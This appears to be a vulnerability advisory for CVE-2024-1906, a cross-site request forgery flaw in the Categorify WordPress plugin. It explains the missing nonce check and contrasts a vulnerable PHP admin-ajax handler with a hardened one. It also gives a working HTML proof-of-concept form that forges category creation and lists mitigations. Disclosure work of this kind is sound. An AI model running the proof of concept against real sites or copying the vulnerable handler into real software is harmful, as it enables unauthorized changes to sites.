A security vulnerability, tracked as CVE-2024-1906, has been disclosed in the Categorify plugin for WordPress. All versions up to and including 1.7.4 are affected. The flaw is a Cross-Site Request Forgery (CSRF): an attacker with no account on the site can craft a request that, when a logged-in administrator's browser submits it, adds a category to the site without the administrator having intended it.

Details

The root cause is missing or incorrect nonce (number used once) validation in the categorifyAjaxAddCategory function, which handles an admin-ajax.php request. Because the handler checks only that the requester is logged in, and not that the request originated from the plugin's own page, a form hosted anywhere on the web can target it: the victim's browser attaches the WordPress login cookie automatically. The attacker is unauthenticated; the privilege comes from the administrator whose browser submits the request. Exploitation therefore requires tricking a site administrator into an action such as clicking a link or pressing a button while logged in to the target site.
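To make the root cause concrete, here is an added illustration written for this post, not the Categorify plugin's own source: an admin-ajax handler that trusts its POST body with no nonce check, beside a hardened handler. The example_* function names, the 'security' request field and the admin.js file are hypothetical; newCategory is the parameter name used in the PoC later on this page.

```php
<?php
// Added illustration for this post, not the Categorify plugin's own code.
// Shows the class of bug described above: an admin-ajax handler that trusts a
// POST body with no nonce, next to a hardened handler. All example_* names,
// the 'security' field and admin.js are hypothetical.

/** Shared work: create the category and emit a JSON response. */
function example_insert_category_and_respond() {
    $name = isset( $_POST['newCategory'] )
        ? sanitize_text_field( wp_unslash( $_POST['newCategory'] ) )
        : '';
    if ( '' === $name ) {
        wp_send_json_error( 'Category name is required.', 400 );
    }
    $term = wp_insert_term( $name, 'category' );
    if ( is_wp_error( $term ) ) {
        wp_send_json_error( $term->get_error_message(), 400 );
    }
    wp_send_json_success( $term );
}

/* ---- Vulnerable pattern ---- */
// wp_ajax_* hooks only fire for a logged-in user, so the handler "knows" an
// admin is present, but nothing proves the admin intended this request. The
// browser attaches the WordPress login cookie to a form posted from any site,
// so a CSRF page like the one in this post reaches wp_insert_term().
add_action( 'wp_ajax_example_add_category_vulnerable', 'example_add_category_vulnerable' );
function example_add_category_vulnerable() {
    example_insert_category_and_respond();
}

/* ---- Hardened pattern ---- */
// Step 1: hand a nonce to the plugin's own admin page script, which sends it
// back as the 'security' POST field alongside action=example_add_category.
add_action( 'admin_enqueue_scripts', 'example_enqueue_admin_script' );
function example_enqueue_admin_script() {
    wp_enqueue_script( 'example-admin', plugins_url( 'admin.js', __FILE__ ), array( 'jquery' ), '1.0', true );
    wp_localize_script( 'example-admin', 'exampleAjax', array(
        'url'   => admin_url( 'admin-ajax.php' ),
        'nonce' => wp_create_nonce( 'example_add_category' ),
    ) );
}

// Step 2: refuse the request unless it carries a valid nonce for this action
// AND the user is allowed to manage categories.
add_action( 'wp_ajax_example_add_category', 'example_add_category' );
function example_add_category() {
    // A cross-site form cannot read the nonce, so it cannot supply one;
    // check_ajax_referer() terminates the request (HTTP 403, body "-1")
    // when the field is missing, expired, or issued to a different user.
    check_ajax_referer( 'example_add_category', 'security' );

    // A nonce proves intent, not privilege: still require the capability
    // WordPress itself checks before creating categories.
    if ( ! current_user_can( 'manage_categories' ) ) {
        wp_send_json_error( 'You are not allowed to add categories.', 403 );
    }

    example_insert_category_and_respond();
}
```

In the hardened version the plugin's admin.js would post action=example_add_category, security=exampleAjax.nonce and newCategory=... to exampleAjax.url; a page on another origin has no way to learn the nonce value, so its forged request dies at check_ajax_referer(). The capability check is kept separately because a nonce only ties the request to the page that issued it, not to what the user is permitted to do.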

Here is a proof-of-concept page illustrating how CVE-2024-1906 can be exploited:

<!DOCTYPE html>
<html>
<head>
<title>CVE-2024-1906 - CSRF PoC</title>
</head>
<body>
  <h1>CSRF POC</h1>
  <!-- Replace the host with the target site. The form posts to admin-ajax.php,
       which dispatches on the "action" field; the victim's browser supplies
       the WordPress login cookie, and no nonce field is required. -->
  <form action="http://targeted-wordpress-site.com/wp-admin/admin-ajax.php" method="POST">
    <input type="hidden" name="action" value="categorifyAjaxAddCategory" />
    <input type="hidden" name="newCategory" value="Unwanted Category" />
    <input type="submit" value="Click me, admin!" />
  </form>
</body>
</html>

Hosted as a plain HTML file on any attacker-controlled site, this form, when submitted by an administrator who is logged in to the target, adds a new category named "Unwanted Category" to that WordPress site. One caveat when reproducing this: browsers that treat cookies without a SameSite attribute as Lax (Chromium-based browsers do) will not send the WordPress login cookie on a cross-site POST, so the form may not fire in those browsers. The missing nonce check is still present on the server either way; SameSite defaults are a browser-side mitigation, not a fix.

Original References

1. Categorify plugin Homepage
2. WordPress related vulnerability - OWASP
3. Cross-Site Request Forgery (CSRF) - OWASP

Protection and Mitigation

To protect your WordPress site from exploitation of CVE-2024-1906, apply the following:

1. Update the Categorify plugin to the latest version. Every release up to and including 1.7.4 is affected, so confirm that the installed version is newer than 1.7.4.

2. Educate site administrators about the risk and encourage safe browsing habits (for example, never clicking untrusted links or opening files from unknown sources). The forged request only works while the administrator's browser holds a valid login session, so logging out of wp-admin when not actively using it also reduces exposure.

Conclusion

CVE-2024-1906 is a CSRF vulnerability in the Categorify plugin for WordPress, affecting all versions up to and including 1.7.4. This post has covered the root cause (missing nonce validation in categorifyAjaxAddCategory), a proof-of-concept page showing how the flaw can be exploited, links to original references, and steps to mitigate it. Understanding and addressing this issue helps keep a WordPress site secure.

Timeline

Published on: 02/27/2024 11:15:08 UTC
Last modified on: 02/27/2024 14:19:41 UTC